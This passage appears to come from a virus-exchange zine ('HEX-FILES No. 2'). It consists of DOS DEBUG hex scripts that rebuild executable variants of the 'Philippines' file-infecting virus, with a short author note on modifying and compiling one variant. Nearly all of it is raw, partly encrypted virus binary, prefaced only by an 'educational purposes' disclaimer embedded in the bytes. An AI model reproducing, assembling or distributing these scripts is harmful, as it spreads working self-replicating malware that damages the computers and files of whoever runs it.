E 0D60 54 E2 C7 74 74 23 48 54 D3 74 23 38 54 62 42 C9
E 0D70 D5 7E 95 40 A5 64 24 9C A4 5C AF 74 74 7D 5C 17
E 0D80 D3 74 47 2A C9 AD A7 AF 54 40 A5 8F 33 64 EF 4C
E 0D90 17 06 76 47 0A D1 84 3D DD A7 46 54 40 A5 AF DC
E 0DA0 64 17 13 74 47 2A D1 84 3D DD A7 74 74 40 A5 AF
E 0DB0 A1 54 EA E2 DA 17 54 74 47 85 C5 9A A2 AA EA E2
E 0DC0 DA 17 E5 B6 47 85 C5 9A A2 AA D7 74 17 03 56 47
E 0DD0 85 C5 40 2D 35 B5 54 5C C9 93 18 7E 80 7E F4 6C
E 0DE0 A4 1E 74 6C A4 D5 7C 28 E4 1E 74 40 63 0D 2C 64
E 0DF0 9C 23 9D 23 05 7C 2D 8D 7C 0C 73 73 73 0C 44 0A
E 0E00 69 81 C9 31 69 A9 6B 0C 44 44 D2 31 29 F9 73 29
E 0E10 F9 73 F2 31 29 11 2D C5 BD F2 FA EA 02 E2 DA A4
E 0E20 64 35 B5 C5 23 78 A3 AC 3C 6C D1 34 23 40 23 63
E 0E30 3C 2D 7B 95 9F C3 3C 40 05 DA FD 57 24 9C C2 B7
E 0E40 74 8B 35 62 6C 01 4D 00 C7 04 74 35 B3 6C C7 A5
E 0E50 44 AF 84 74 D7 9B 35 03 6C D7 A3 35 0B 6C 5C 9C
E 0E60 9A A2 C2 AA BA B2 CA 7E 35 38 C5 35 A8 C5 A7 3D
E 0E70 54 38 D4 A7 74 74 40 A5 AF A1 54 EA E2 DA 17 03
E 0E80 86 47 85 C5 9A A2 AA EA E2 DA 17 E5 B6 47 85 C5
E 0E90 35 7A A5 A7 DE 54 38 D4 9A A2 AA 17 84 66 47 85
E 0EA0 C5 35 BA A5 40 36 A7 C0 54 8F 1A 64 BB 0E E1 6B
E 0EB0 EE 2D EE 2D EE 2D EE 2D BB 0E E1 CC 23 3B 24 83
E 0EC0 3C 70 6D 9D 1C BB 0E E1 34 FB BE 40 0E 30 94 3D
E 0ED0 64 40 8E 3B AE 30 94 A7 80 54 30 14 EA FA 35 CD
E 0EE0 8D A7 7E 54 38 D4 9F 46 54 40 DD AF DC 64 17 43
E 0EF0 66 47 85 C5 A7 AF 54 40 A5 C7 33 64 AF 4C 74 17
E 0F00 06 36 47 42 C9 AD AA 7D 8C EA 35 9D AD A7 6F 54
E 0F10 38 D4 A7 08 54 9F 1A 64 AA 3B AD 7C DD 40 A5 17
E 0F20 03 86 47 2A C9 AD 35 7D AD A7 08 54 AA 9F 30 54
E 0F30 38 CC 40 A5 17 03 86 47 85 C5 24 5C 35 7F 8D 24
E 0F40 9C 2D 7C 8D 02 A4 64 40 C6 78 99 6C C3 C9 54 48
E 0F50 5C 3D 5C D7 AC 35 FB 74 54 6A 24 9C A4 5C 87 07
E 0F60 64 D7 C3 9F C3 3C 40 1D 95 3F C7 07 64 35 29 C5
E 0F70 01 24 A7 44 3C 17 47 44 76 C9 C5 40 CE 35 83 BD
E 0F80 5C 9C C2 7E FB 06 FB 2E B7 74 82 98 23 9D A4 E3
E 0F90 3C 7E 6A C3 43 23 4A B2 4A 74 74 76 9E 75 9E 75
E 0FA0 9E 75 9E 75 9E 75 7F 75 74 76 86 75 86 75 06 75
E 0FB0 06 75 06 75 F7 75 74 76 9E 75 9E 75 9E 75 9E 75
E 0FC0 9E 75 F6 75 74 76 9E 75 9E 75 9E 75 9E 75 9E 75
E 0FD0 9E 75 F6 75 74 76 86 75 86 75 06 75 06 75 06 75
E 0FE0 F7 75 74 76 9E 75 9E 75 9E 75 9E 75 9E 75 9E 75
E 0FF0 7F 75 74 76 9E 75 9E 75 9E 75 9E 75 9E 75 9E 75
E 1000 74 76 86 75 86 75 06 75 06 75 06 75 F7 75 86 75
E 1010 86 75 74 76 7F 75 9E 75 9E 75 9E 75 9E 75 F6 75
E 1020 74 76 9E 75 06 75 06 75 06 75 F7 75 74 76 F6 75
E 1030 9E 75 9E 75 9E 75 9E 75 7F 75 74 76 7F 75 9E 75
E 1040 9E 75 7F 75 74 76 06 75 06 75 06 75 F7 75 74 76
E 1050 F6 75 9E 75 9E 75 F6 75 7A 32 3A 12 2A FA D2 23
E 1060 43 74 16 98 23 9D 64 13 3C C9 1C 23 A5 24 B4 3C
E 1070 C9 34 23 78 A3 C2 6C 81 F9 64 90 23 9D 23 23 3C
E 1080 90 95 24 9C A4 5C A7 C7 64 AF A7 74 35 A8 AD BF
E 1090 74 B7 0E EC 53 F3 93 F3 C9 7C BF 74 F7 28 BE FB
E 10A0 E5 9F 48 3C AF 77 1C EA DA E2 FD 4F B7 7C 74 0E
E 10B0 F4 D7 6C AF 73 73 0E F4 24 A4 5C 9C 9A A2 AA 40
E 10C0 2D FD 4F FB BE EF 1C EA A7 04 5C 40 BD BB 8E 01
E 10D0 7C 35 D1 6C EF 5C FD 4F A7 73 5C 40 BD 70 5E 77
E 10E0 74 EF 2C FD 4F A7 04 5C 40 BD 70 5E 72 6C EF 5C
E 10F0 FD 4F 35 31 6C 80 7E 84 AA 85 16 EF 7C EA A7 55
E 1100 64 40 BD BB 8E 01 7C 35 A3 6C EF 34 FD 4F A7 D5
E 1110 64 40 BD 70 5E 77 74 EF 5C FD 4F A7 84 5C 40 BD
E 1120 70 5E 72 6C EF 34 FD 4F 35 03 6C 80 7E 84 AA 85
E 1130 16 EF 7C EA A7 03 5C 40 BD BB 8E 01 7C 35 34 6C
E 1140 EF 5C FD 4F A7 72 5C 40 BD 70 5E 77 74 EF 64 FD
E 1150 4F A7 12 5C 40 BD 70 5E 72 6C EF 5C FD 4F 35 95
E 1160 74 80 7E 84 AA 85 16 EF 7C EA A7 C2 5C 40 BD BB
E 1170 8E 01 7C 35 06 74 EF 4C FD 4F A7 51 5C 40 BD 70
E 1180 5E 77 74 EF 4C FD 4F A7 21 5C 40 BD 70 5E 72 6C
E 1190 EF 4C FD 4F 35 66 74 80 7E 84 AA 85 16 EF 54 EA
E 11A0 A7 C7 64 40 BD BB 8E 01 7C 35 98 74 EF 5C FD 4F
E 11B0 A7 36 64 40 BD 70 5E 77 74 EF 5C FD 4F A7 E6 64
E 11C0 40 BD 70 5E 72 6C EF 5C FD 4F 35 F8 74 80 7E 84
E 11D0 AA 85 16 2D 1D A5 D7 42 BF 2E 74 0E 6B 24 9C 5E
E 11E0 64 13 3C 74 74 66 64 B4 3C 54 B7 6B CB 0E 6B 18
E 11F0 64 B3 3C 30 A4 E3 3C D7 4B C7 BA 6C 35 18 8D B7
E 1200 34 CB 35 68 8D 18 64 F3 3C 30 A4 23 3C D7 4B C7
E 1210 88 5C 35 E1 8D 28 64 63 3C 64 9C FB 9D AF 9D 99
E 1220 03 76 05 27 B3 4C 75 C5 1F 27 40 DE 64 24 5C 35
E 1230 04 8D B7 74 3A BF 8F 74 35 F2 8D 5C D7 2A 35 42
E 1240 8D D7 EB C7 2E 74 0E 6B B2 0B 2C 74 F2 A7 48 3C
E 1250 FB 9D DA AF F6 5C FD 4F 35 84 74 BA 7E 9F 4C 74
E 1260 DD EE F8 85 8D 1A C9 B5 7E 78 95 7A D1 7C 2D 25
E 1270 DD 23 30 23 63 3C 8F 98 2C 2D 90 BD 23 40 23 63
E 1280 3C 23 70 A3 A5 44 B4 B8 C9 55 44 76 D1 7C 78 2E
E 1290 6C 90 35 E5 95 01 4C 98 78 6D A5 90 1E 78 95 8B
E 12A0 C9 5E 23 30 23 63 3C 8F 0E 2C 2D 11 BD 23 40 23
E 12B0 63 3C 23 70 A3 A5 44 B4 B8 C9 FF 90 35 16 95 AD
E 12C0 CA 98 B2 40 15 30 62 64 8A B7 84 74 1E 74 84 F7
E 12D0 1C 48 75 E5 D6 40 B6 DD FE 0E 6B BB 7E A4 64 98
E 12E0 FB 76 28 B6 56 64 51 74 18 64 64 74 7F 54 74 90
E 12F0 5C 9C 7E 40 23 83 3C 70 4E 74 6C 35 CD CD 2C 33
E 1300 DC 9E FC 6B 2F CB 9E A4 6B A6 2C 23 37 9C 0E FA
E 1310 7D 3E 7C BC 9E 5C 6B BE B4 23 37 9C E6 73 0E FD
E 1320 6D 3E 39 C0 A4 B6 1B 6B F1 73 85 96 2A 6B 9E 43
E 1330 6B 1A 27 02 27 89 8C 2C 8F A4 2F C9 7B 99 A6 EB
E 1340 3B 37 9C 0E 3A 5D 3E 7C BC 1B 53 2C CF A4 24 42
E 1350 A4 1B 93 1B 53 EE 6B A6 0F 6B BE BA 33 37 BC FC
E 1360 1E AE 89 BA 11 AA 41 94 C8 53 AA 40 94 C8 7B 34
E 1370 F4 37 14 9E A8 53 A6 3B 6B F4 4E 2C B1 DC F8 BB
E 1380 9E 3B 33 37 84 0E 3E 3B 6D C0 BC AE 63 71 F2 25
E 1390 2C AC B4 F8 43 CE 61 2C E4 B4 24 50 DC 09 20 30
E 13A0 28 60 6A 18 20 6A E9 C0 C8 10 30 F0 60 6A 31 60
E 13B0 D0 60 A0 60 18 6A F0 60 6A 01 60 18 20 08 60 0A
E 13C0 6A 50 68 69 6C 69 70 70 69 6E 65 73
RCX
12CC
W
Q
ÄÄ PHIL2796.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This is the result of my first fix. It is similar to the original virus,
Philippines 1, except for a few changes.
This is referred to by me as Philippines 1A.
TASM 2.01 was used to compile the source code.
ÄÄ PHIL2833.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
N PHIL2833.COM
E 0100 BB F8 0A BE E0 08 56 FC C3 A3 71 AF 89 16 73 AF
E 0110 B8 00 18 98 D2 CD 21 C6 06 23 AE 00 8E 1E 07 A3
E 0120 69 70 70 69 6E 65 73 2E 32 38 33 33 20 76 69 72
E 0130 75 73 20 63 6F 6D 69 6E 67 20 74 6F 20 79 6F 75
E 0140 20 66 72 6F 6D 20 74 68 65 20 50 68 69 6C 69 70
E 0150 70 69 6E 65 73 2E 0D 0A 42 72 6F 75 67 68 74 20
E 0160 74 6F 20 79 6F 75 20 6C 69 76 65 20 62 79 20 48
E 0170 45 58 2D 46 49 4C 45 53 20 4E 6F 2E 20 32 0D 0A
E 0180 0A 48 45 58 2D 46 49 4C 45 53 20 61 6E 64 20 50
E 0190 75 74 6F 6B 73 61 20 4B 61 77 61 79 61 6E 20 61
E 01A0 72 65 20 6E 6F 74 20 72 65 73 70 6F 6E 73 69 62
E 01B0 6C 65 20 66 6F 72 20 61 63 74 75 61 6C 2C 20 69
E 01C0 6D 70 6C 69 65 64 0D 0A 61 6E 64 2F 6F 72 20 69
E 01D0 6D 61 67 69 6E 61 72 79 20 64 61 6D 61 67 65 20
E 01E0 62 72 6F 75 67 68 74 20 61 62 6F 75 74 20 62 79
E 01F0 20 74 68 65 20 75 73 65 2C 20 6D 69 73 75 73 65
E 0200 20 6F 72 20 6E 6F 6E 2D 75 73 65 20 6F 66 0D 0A
E 0210 74 68 69 73 20 76 69 72 69 69 2E 20 54 68 65 20
E 0220 70 65 72 73 6F 6E 20 77 68 6F 20 65 78 65 63 75
E 0230 74 65 73 20 74 68 69 73 20 76 69 72 69 69 20 62
E 0240 65 61 72 73 20 66 75 6C 6C 20 72 65 73 70 6F 6E
E 0250 73 69 62 69 6C 69 74 79 0D 0A 66 6F 72 20 68 69
E 0260 73 2F 68 65 72 20 61 63 74 69 6F 6E 73 2E 0D 0A
E 0270 0A 54 68 69 73 20 76 69 72 69 69 20 69 73 20 73
E 0280 74 72 69 63 74 6C 79 20 66 6F 72 20 65 64 75 63
E 0290 61 74 69 6F 6E 61 6C 20 6F 72 20 72 65 73 65 61
E 02A0 72 63 68 20 70 75 72 70 6F 73 65 73 20 6F 6E 6C
E 02B0 79 2E 0D 0A 0A 24 08 20 1A 20 20 20 20 20 20 20
E 02C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 02D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 02E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 02F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0300 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0310 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0320 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0330 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0340 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0350 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0360 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0370 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0380 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0390 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 03A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 03B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 03C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 03D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 03E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 03F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0400 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0410 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0420 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0430 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0440 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0450 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0460 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0470 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0480 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0490 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 04A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 04B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 04C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 04D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 04E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 04F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0500 BA 07 01 B4 09 CD 21 B4 4C CD 21 20 20 20 20 20
E 0510 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0520 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0530 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0540 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0550 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0560 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0570 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0580 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0590 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 05A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 05B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 05C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 05D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 05E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 05F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0600 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0610 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0620 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0630 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0640 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0650 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0660 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0670 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0680 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0690 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 06A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 06B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 06C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 06D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 06E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 06F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0700 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0710 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0720 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0730 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0740 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0750 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0760 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0770 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0780 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0790 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 07A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 07B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 07C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 07D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 07E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 07F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0800 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0810 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0820 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0830 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0840 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0850 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0860 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0870 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0880 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0890 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 08A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 08B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 08C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 08D0 E9 0E ED 0E FF FF F9 0E FF FF EF 0E FF FF F0 0E
E 08E0 BF EE 08 57 5E AC 2C 81 AA 4B 74 02 EB F7 69 81
E 08F0 81 0D 49 DE 04 6E 92 11 6A 3E 81 0F 87 C4 8C B4
E 0900 80 0C 78 3A 92 8C 74 25 87 A0 44 3C 79 8B 3F C5
E 0910 C5 D7 7D 44 69 A8 85 8B 53 F6 89 83 57 51 6B 8B
E 0920 53 F5 72 44 7D 0C 5B D3 0B 88 8B 41 F5 8F BD E2
E 0930 F3 88 BD FB F8 84 01 B0 A1 C4 6C 6D 0C 4C C2 DF
E 0940 AC 4F D2 9F 88 31 AF 0C 7B 73 2F 39 D9 C6 B9 A6
E 0950 F6 90 BA C6 82 F6 BB 8F 88 AF 47 87 BF 8C 82 6C
E 0960 B7 39 D0 CE BA C6 82 F6 A9 01 BE C4 F6 A4 DA D2
E 0970 04 6A 85 39 DD BB B9 C6 80 F5 89 B9 E6 80 F5 84
E 0980 D0 63 74 0C 78 8F 88 40 3A 81 3A 8C 81 74 27 F6
E 0990 47 AF 47 87 BF 8C 81 DA 44 C4 D0 CE CE C2 CF C5
E 09A0 AF C4 D0 CE 81 81 01 81 5C 85 DD 81 5C 85 ED 81
E 09B0 5C 85 81 83 91 81 DE 81 3F 6E 81 84 76 0C 7F 3B
E 09C0 9A 8B 32 84 2D 53 49 2B CB F5 83 6C 78 76 81 89
E 09D0 99 30 DD 78 4E B1 D1 E6 22 CA D6 CB 24 CB E0 40
E 09E0 CE 2F D4 6B D2 87 5D CA B9 86 B9 94 92 25 52 C2
E 09F0 87 EB EA B9 96 B9 94 92 B9 C6 39 D1 92 0A 0E 63
E 0A00 EF 9A D0 6B D2 CE 88 C2 26 8F 25 E2 5B E2 2E CE
E 0A10 C7 3F 26 B8 5C 6D 1A 1D 42 92 8F AD E2 1C 6D BC
E 0A20 05 F2 CA 8F D5 E2 D8 8F A0 8A 63 D9 35 CA C2 3D
E 0A30 74 E2 D2 67 74 05 4A CA 57 E5 D8 77 50 26 B8 B9
E 0A40 E8 7A 74 92 0D E9 E1 8F 33 E2 D8 4D D2 B8 FA 96
E 0A50 67 51 37 AE D0 E2 4A CA BE D0 05 86 E2 57 E5 FA
E 0A60 32 F2 4C 25 D0 C2 64 98 7C 44 7C 34 AD 7F 50 9D
E 0A70 DF 1F 04 3C D8 DA 2E 21 CA 94 6B 8A 21 B2 4F 6B
E 0A80 1D 87 09 8A 4C 54 44 5C 7C 74 3A FA 8F 57 EA 8F
E 0A90 AC CA F2 32 34 3C 1C 04 14 0C 26 B9 37 B9 14 92
E 0AA0 F9 C5 A9 CA D5 94 92 B9 AE FA 90 CA B9 AE FA B0
E 0AB0 CA B9 AE FA 50 CA FA BA F2 55 C2 3D BE EA 05 B1
E 0AC0 CA 8F ED 37 9A 18 6B 82 35 DF 9A 57 ED 3F 98 97
E 0AD0 9F F2 1F AE 90 BE 50 2D BD 92 17 87 94 F2 8F D4
E 0AE0 3F B9 CE 39 39 92 CA 63 C2 D8 96 5F 35 34 92 57
E 0AF0 ED BA 32 0D E9 61 8F 50 EA 86 3A 74 92 AE FA 04
E 0B00 92 0D E9 E1 1D 93 C2 8F 35 EA BA F2 1D 34 92 0D
E 0B10 CA 21 8F 6D EA 5B 84 56 0D DA DC 05 37 37 1D 67
E 0B20 37 8F E5 EA 05 92 CA 1D 42 92 6D 31 8F 1E EA 5B
E 0B30 42 1D 5A CA 8F A6 EA 1D D1 92 05 DA CA 6D 31 8F
E 0B40 F6 EA 2E 6D 39 8F C6 EA 26 5B 62 35 42 92 3D FA
E 0B50 92 05 92 CA 57 FD 63 92 C6 39 D1 92 0A 0E 63 D2
E 0B60 87 30 3F 51 60 15 34 92 CE 33 C2 19 63 E2 9E 72
E 0B70 CE 9F CC 6D 79 8F 44 EA 5B FF 77 D7 77 C7 92 60
E 0B80 63 E2 21 CA AA 5B 08 15 55 CA 6D 8C 8F 19 EA 5B
E 0B90 B8 D5 D4 92 1D 34 92 0D CA D4 8F A9 EA 5B 1C 86
E 0BA0 BA C4 92 0D C2 D4 51 88 8F 3A EA 5B AC 0D DA 21
E 0BB0 8F 7A EA 5B EC 56 86 3A 31 92 0D CA 74 8F 82 EA
E 0BC0 86 BA A4 92 86 7A B4 92 51 88 51 60 0D DA DC 8F
E 0BD0 77 D2 D5 F4 92 86 7A E4 92 4C 8F E7 D2 1D 42 92
E 0BE0 05 C9 CA 6D 31 8F C7 D2 0C C6 39 42 92 A4 1C 6B
E 0BF0 92 21 88 F2 5B A4 87 56 CA 87 F2 C2 C5 32 92 D5
E 0C00 80 CA C5 C1 92 D5 5A 9A C5 F1 92 D5 31 EA C5 E1
E 0C10 92 D5 21 EA C5 62 92 D6 39 52 92 CA 6B C2 8C 77
E 0C20 F9 60 CA D2 FA 52 92 D6 60 CA D2 FA 70 CA D6 60
E 0C30 CA E1 4F 37 D5 F4 92 86 7A E4 92 E2 42 92 D6 60
E 0C40 CA 53 D2 87 8D CA 77 79 60 CA 92 60 6B C2 CC D5
E 0C50 62 92 86 7A 52 92 96 7A E4 92 C5 F4 92 77 79 70
E 0C60 CA 91 FA 02 92 D5 F1 92 F8 FA E1 92 25 EA F8 FA
E 0C70 D1 92 0A 0E F8 FA C1 92 BD 92 D5 32 92 3F FA 66
E 0C80 C2 87 D9 DA 8F 11 D2 05 2A CA 97 AC C5 F4 92 E2
E 0C90 4A CA 5B 1C E1 4F 37 D5 F4 92 E2 42 92 5B B4 3A
E 0CA0 F2 35 74 E2 3D 42 92 05 4A CA 57 E5 3F FA 66 C2
E 0CB0 87 E3 FA B9 BE 3A F4 92 35 42 92 74 05 4A CA 57
E 0CC0 E5 BA 32 34 3D 91 CA 05 82 CA 57 ED F8 FA D1 92
E 0CD0 0A 0E 8F A7 DA 05 C9 CA 1D 42 92 6D CC 8F 87 DA
E 0CE0 96 BA A4 92 96 7A B4 92 0D C2 74 8F 18 DA 6D 39
E 0CF0 8F 80 DA 96 BA C4 92 D6 88 C2 1D 34 92 0D C2 D4
E 0D00 8F 00 DA BE FA D4 92 6D 84 8F 25 DA 87 F3 FA 8F
E 0D10 A9 CA 9A 60 63 DA 97 77 9E 5F 7F 20 D8 CA C2 CA
E 0D20 CA B9 96 7A F4 92 B9 96 BA E4 92 B9 96 3A 31 92
E 0D30 8F 56 DA 05 42 92 51 60 6D CC 8F AE DA D8 51 D0
E 0D40 A8 1A B9 01 7A 84 92 B9 86 7A 84 92 63 AA 5C 6D
E 0D50 A9 8F 63 DA 0C B9 51 FA A4 92 D2 E0 D2 C8 77 DF
E 0D60 D2 50 D6 07 C2 7B FA 96 E0 77 C7 D2 50 D8 55 7E
E 0D70 6E 76 3E 38 46 7E 38 B5 9E 96 4E 6E AE 3E 38 6D
E 0D80 3E 8E 3E FE 3E 46 38 AE 3E 38 5D 3E 46 7E 56 3E
E 0D90 58 38 B5 76 7E 56 7E B6 B6 7E 46 1E AE 15 A8 EA
E 0DA0 05 88 DA D4 B9 CE 71 95 84 6B DA 97 7F 2F 96 17
E 0DB0 F4 96 77 FA BA 32 3A F2 05 B3 D2 D7 F2 AD 69 95
E 0DC0 9D 84 63 07 3D 77 EA 96 3F 25 B2 FA 45 E2 AD 60
E 0DD0 D0 9D A4 6B DA 97 77 3D 8A E2 96 3F 05 3F E2 AD
E 0DE0 A9 64 9D 84 6B DA 97 77 3D CA CA 96 3F 05 25 EA
E 0DF0 44 7C 74 AD EA 64 9D DF 1F 34 3C 04 44 7C 74 AD
E 0E00 7F 10 9D DF 1F 34 3C 04 6D C7 AD 59 F0 9D DF 1F
E 0E10 96 87 8F 38 EA F2 63 2A AE D8 D6 D8 4A C2 3A 80
E 0E20 CA C2 3A 31 EA BE 7A 80 CA 96 F9 5A 9A FA 32 B9
E 0E30 37 B9 21 EA 87 72 2F 87 27 D2 A2 C9 C9 C9 A2 9A
E 0E40 A4 C3 DB 63 8B C3 03 C1 A2 9A 9A 6C 8B 83 53 C9
E 0E50 83 53 C9 4C 8B 83 AB 4C 54 44 5C 7C 74 3A FA 8F
E 0E60 E0 1F B9 CE 39 39 92 C2 6B 8A B9 96 B9 94 92 87
E 0E70 C9 2F 35 34 92 96 5F 74 57 ED BA 32 1C 0D CA 21
E 0E80 8F FC C2 5B E7 56 1D 5A CA 8F 09 C2 1D D1 92 05
E 0E90 DA CA 6D 31 8F 59 C2 6D 39 8F A1 C2 F2 32 34 3C
E 0EA0 1C 04 14 0C 64 D8 8F 5C 1F 8F 8B 1F 3D 81 E2 8E
E 0EB0 6A 3D CA CA 96 3F 05 25 EA 44 7C 74 AD 59 E0 9D
E 0EC0 DF 1F 34 3C 04 44 7C 74 AD 7F 10 9D DF 1F 8F 39
E 0ED0 3F 3D 62 E2 8E 6A 34 3C 04 AD DA 00 9D DF 1F 8F
E 0EE0 2C 3F 96 90 3D 08 EA 25 09 FA 11 A8 7B C1 48 87
E 0EF0 48 87 48 87 48 87 11 A8 7B 62 B9 91 BA F4 92 C6
E 0F00 C7 37 B2 11 A8 7B 8A 51 18 96 A8 86 2A 97 FA 96
E 0F10 28 91 08 86 2A 3D C8 EA 86 AA 44 54 8F 4F 27 3D
E 0F20 C2 E2 8E 6A 35 8A E2 96 77 05 3F E2 AD 99 00 9D
E 0F30 DF 1F 3D 77 EA 96 3F 1D B2 FA 05 E2 CA AD 60 90
E 0F40 9D 9C 63 07 04 D7 22 44 8F 88 07 3D 38 EA 8E 6A
E 0F50 3D C0 EA 35 09 FA 04 91 07 D2 77 96 3F AD 59 E0
E 0F60 9D 84 63 07 8F A5 07 3D C0 EA 04 35 F8 EA 8E 62
E 0F70 96 3F AD 59 E0 9D DF 1F BA F2 8F ED 27 BA 32 87
E 0F80 DA 27 5C 3A FA 96 20 CE 33 C2 19 63 EA 9E F2 97
E 0F90 F2 6D 02 8F 51 CA EA C4 BA 32 3A F2 DD 4F FA 6D
E 0FA0 19 35 34 92 96 B7 2F 95 1D 4F FA 8F FB 1F 5B BA
E 0FB0 3D B1 92 AD 9D 9A D0 63 1F 96 68 8F C9 17 F2 32
E 0FC0 1C D8 51 60 51 88 0D CA DC 2E B9 37 3A 14 92 D8
E 0FD0 C4 19 99 B9 E4 0C E4 CA CA D0 38 CF 38 CF 38 CF
E 0FE0 38 CF 38 CF D5 CF CA D0 E0 CF E0 CF 60 CF 60 CF
E 0FF0 60 CF 4D CF CA D0 38 CF 38 CF 38 CF 38 CF 38 CF
